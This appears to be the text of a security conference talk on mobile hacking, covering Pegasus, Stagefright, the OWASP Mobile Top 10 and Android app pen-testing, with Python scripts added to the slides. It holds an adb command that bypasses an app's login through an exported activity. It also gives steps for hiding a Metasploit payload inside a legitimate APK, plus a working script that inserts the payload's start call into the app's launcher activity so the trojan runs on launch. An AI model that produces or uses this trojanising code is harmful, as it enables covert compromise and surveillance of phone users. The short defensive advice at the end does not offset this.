Mobile hacking, pentest, and malware

Mobile [hacking, pen-test, malware] Ahmad Muammar OSCE, OSCP, eMAPT

Ahmad Muammar WK, Freelance IT Security Consultant / Pen-Tester

Certification: OSCE, OSCP, eMAPT

Founder echo.or.id (2003), ubuntulinux.or.id (2005), idsecconf.org (2008)

http://me.ammar.web.id

@y3dips

Why Mobile?

Image taken from: http://www.wired.com/gadgetlab/2012/02/meet-the-asus-padfone-the-phone-thats-a-tablet-thats-a-notebook/

Mobile phone

Image taken from: www.astanos.ch/img/apple-android-windows-mobile-blackberry-logo.png

Mobile Hacking

Sophisticated, targeted mobile attack against high-value targets on iOS: the Pegasus malware by NSO Group

Pegasus Exploit

CVE-2016-4655: Information leak in the kernel. A kernel base mapping vulnerability that leaks information to the attacker, allowing the kernel's location in memory to be calculated (defeating KASLR).

CVE-2016-4656: Kernel memory corruption leading to jailbreak. 32- and 64-bit iOS kernel-level vulnerabilities that allow the attacker to silently jailbreak the device and install surveillance software.

CVE-2016-4657: Memory corruption in WebKit. A vulnerability in Safari's WebKit that allows the attacker to compromise the device when the user clicks on a link; this is the entry point, and the two kernel bugs above are chained after it.

Pegasus is developed by NSO Group, an American-owned company based in Israel, which specialises in zero-days, obfuscation, encryption and kernel-level exploitation.

The attack sequence, boiled down, is a classic phishing scheme: send a text message, open the web browser, load the page, exploit the vulnerabilities, install persistent software to gather information.

Stagefright

"Stagefright" is the nickname given to a family of vulnerabilities (and the exploits built on them) in libstagefright, the Android media library that parses and plays video files: a crafted media file is enough to reach the bug.

http://www.androidcentral.com/stagefright

Mr. Robot eps2.6_succ3ss0r.p12

Mobile Pen-Test

OWASP Mobile Top 10 (2014)

M1. Weak Server Side Controls

M2. Insecure Data Storage

M3. Insufficient Transport Layer Protection

M4. Unintended Data Leakage

M5. Poor Authorization and Authentication

M6. Broken Cryptography

M7. Client Side Injection

M8. Security Decisions via Untrusted Inputs

M9. Improper Session Handling

M10. Lack of Binary Protections

OWASP Mobile top 10 2014 - https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks

Mobile Pen-test

What a pen-tester "normally" does is static analysis and dynamic analysis.

Static: decompile and recompile, reverse, decrypt; read the code, manifest and resources without running the app.

Dynamic: run the app and observe its behaviour: logs, database updates, etc.

SecureBox Apps

“SecureBox: protect all your text using Login for every account.”

SecureBox Apps Pen-test

Decompile the app using Apktool.

First, read AndroidManifest.xml!

Decompile SecureBox Apps

SecureBox AndroidManifest

Decompile Apps Using Apktool

Read AndroidManifest.xml. The thing to look for is an activity reachable from outside the app: one declared with android:exported="true", or one that has an <intent-filter> and no explicit android:exported, which was exported by default on the Android versions current at the time of the talk (from Android 12 the attribute must be set explicitly). If nothing is obviously wrong there, continue…

We can try to start the Secure activity directly with the Activity Manager tool (am). Because the activity is reachable by intent, am launches it without passing through the Login activity.

SecureBox Bypass

$ adb shell
root@android:/# am start -a android.intent.action.Secure -n inc.ammar.securebox/.Secure

\o/ w00t, no password needed!
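The manifest check in the steps above can be scripted. The following is an added example, not code from the talk: it parses a decoded AndroidManifest.xml as Apktool writes it, applies the pre-Android 12 export rule (an explicit android:exported wins; otherwise an activity with an <intent-filter> is exported), and builds the am start command that reaches each exported activity directly. The manifest is constructed for the example: only the package name inc.ammar.securebox, the .Secure activity and the action android.intent.action.Secure come from the slides; the .Login, .Settings and .Internal activities are hypothetical, added to exercise each branch of the rule.

```python
"""List exported activities from a decoded AndroidManifest.xml and build the
`am start` command that launches each one directly (added example; the
manifest below is constructed, not SecureBox's real manifest)."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def android_attr(elem, name):
    """Read an android:-prefixed attribute such as android:name."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


# Constructed sample. Only inc.ammar.securebox, .Secure and the action
# android.intent.action.Secure come from the talk; .Login, .Settings and
# .Internal are hypothetical, added to exercise each branch of the rule.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="inc.ammar.securebox">
  <application android:label="SecureBox">
    <activity android:name=".Login">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".Secure">
      <intent-filter>
        <action android:name="android.intent.action.Secure"/>
        <category android:name="android.intent.category.DEFAULT"/>
      </intent-filter>
    </activity>
    <activity android:name=".Settings" android:exported="false">
      <intent-filter>
        <action android:name="inc.ammar.securebox.SETTINGS"/>
      </intent-filter>
    </activity>
    <activity android:name="inc.ammar.securebox.Internal"/>
  </application>
</manifest>
"""


def is_exported(activity):
    """Pre-Android 12 rule: an explicit android:exported wins; without it, an
    activity is exported exactly when it declares an <intent-filter>."""
    explicit = android_attr(activity, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return activity.find("intent-filter") is not None


def exported_activities(manifest_xml):
    """Return (package, [(fully.qualified.Name, [actions...]), ...])."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    found = []
    for act in root.iter("activity"):
        if not is_exported(act):
            continue
        name = android_attr(act, "name")
        full = pkg + name if name.startswith(".") else name
        actions = [android_attr(a, "name") for a in act.iter("action")]
        found.append((full, actions))
    return pkg, found


def am_start_commands(manifest_xml):
    """One `am start` line per exported activity, using the first declared
    action as -a and the package/.Class shorthand the talk uses for -n."""
    pkg, found = exported_activities(manifest_xml)
    cmds = []
    for full, actions in found:
        short = "." + full[len(pkg) + 1:] if full.startswith(pkg + ".") else full
        cmd = "am start"
        if actions:
            cmd += " -a " + actions[0]
        cmd += " -n %s/%s" % (pkg, short)
        cmds.append(cmd)
    return cmds


if __name__ == "__main__":
    for line in am_start_commands(SAMPLE_MANIFEST):
        print(line)
```

Run it against the manifest Apktool decoded into the app's output directory and paste each printed line into adb shell (or prefix it with adb shell). Any activity that comes up past the login screen is the finding; the fix on the app side is android:exported="false" on every activity that is not meant to be launched by other apps, plus an in-activity check that the user is authenticated.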

Mobile Malware

Inject a legitimate app with MSF

Create the Metasploit APK (msfvenom)

Decompile the Metasploit APK using Apktool

Decompile the legitimate application using Apktool

Copy the smali folder from the Metasploit APK into the smali folder of the legitimate application

Find the "correct place" to inject and invoke the Metasploit payload: a method that runs as soon as the app is opened, such as the launcher activity's onCreate

Recompile the application

Sign and verify. The repackaged APK carries a new signature, so it installs only as a fresh app, never as an update over the original; the permissions the payload needs (INTERNET, etc.) also have to be present in the manifest, or it cannot connect back.
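The "correct place" step above is the one the slides leave implicit. The following is an added example, not the talk's code and not Metasploit's own injector: it locates the super.onCreate() call in a decompiled Activity's smali and inserts the single invoke-static that starts the Metasploit Android payload right after it, so the payload runs the moment the app opens. The smali file is constructed for the example; the hook target Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V is assumed to be the class name as it appears in the Metasploit APK decompiled in the earlier step (that is the stager's default, but it must match whatever sits under smali/com/metasploit/stage/ after the copy).

```python
"""Find the "correct place" in a decompiled Activity and insert the call that
starts the Metasploit Android payload (added example, not the talk's code and
not Metasploit's own injector). The smali below is constructed; the hook class
Lcom/metasploit/stage/Payload; is assumed to be the default name in the
decompiled Metasploit APK copied into the target's smali/ tree."""
import re

# The super.onCreate(...) call inside onCreate: the first thing every Activity
# runs, so code placed right after it executes as soon as the app is opened.
ONCREATE_SUPER = re.compile(
    r"^\s*invoke-super\s+\{p0,\s*p1\},\s*L[\w/$]+;->onCreate\(Landroid/os/Bundle;\)V\s*$"
)

# The hook only needs p0 (this, which is a Context), so no extra .locals are required.
HOOK = "    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"

# Constructed sample: what Apktool emits for a minimal onCreate.
SAMPLE_SMALI = """.class public Lcom/example/notes/MainActivity;
.super Landroid/app/Activity;

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1

    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

    const v0, 0x7f030000

    invoke-virtual {p0, v0}, Lcom/example/notes/MainActivity;->setContentView(I)V

    return-void
.end method
"""


def find_injection_point(smali):
    """Index of the line following super.onCreate(), or None if absent."""
    for i, line in enumerate(smali.splitlines()):
        if ONCREATE_SUPER.match(line):
            return i + 1
    return None


def is_hooked(smali):
    """True if the payload start call is already present. The same test is a
    quick check when reviewing a third-party APK for this kind of repackaging."""
    return any(l.strip() == HOOK.strip() for l in smali.splitlines())


def inject_hook(smali):
    """Return the smali with the payload call inserted after super.onCreate().
    Idempotent; raises if the file has no onCreate to hook."""
    if is_hooked(smali):
        return smali
    idx = find_injection_point(smali)
    if idx is None:
        raise ValueError("no super.onCreate() call found; choose another entry point")
    lines = smali.splitlines()
    lines.insert(idx, HOOK)
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(inject_hook(SAMPLE_SMALI))
```

Pick the Activity named in the manifest's MAIN/LAUNCHER intent-filter, run inject_hook over its .smali file, then recompile and sign as in the steps above. msfvenom's -x option performs this same injection (and the manifest permission merge) automatically; doing it by hand shows exactly what ends up in the APK, and is_hooked is the one-line pattern a reviewer greps for when triaging a suspicious repackaged app.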

Survive

Anything that must truly remain private should not reside on the mobile device; keep it on the server.

Design the mobile client and the server following security best practice.

Design and implement all apps under the assumption that the user's device will be lost or stolen.

Include a mobile security pen-test/audit in the software development life cycle.

Image taken from: http://sciencetoybox.com/images/Procedures/Raising_hands.jpg

Mobile [Hacking, Pen-test, Malware]

Thank you ;-)

Ahmad Muammar OSCE, OSCP, eMAPT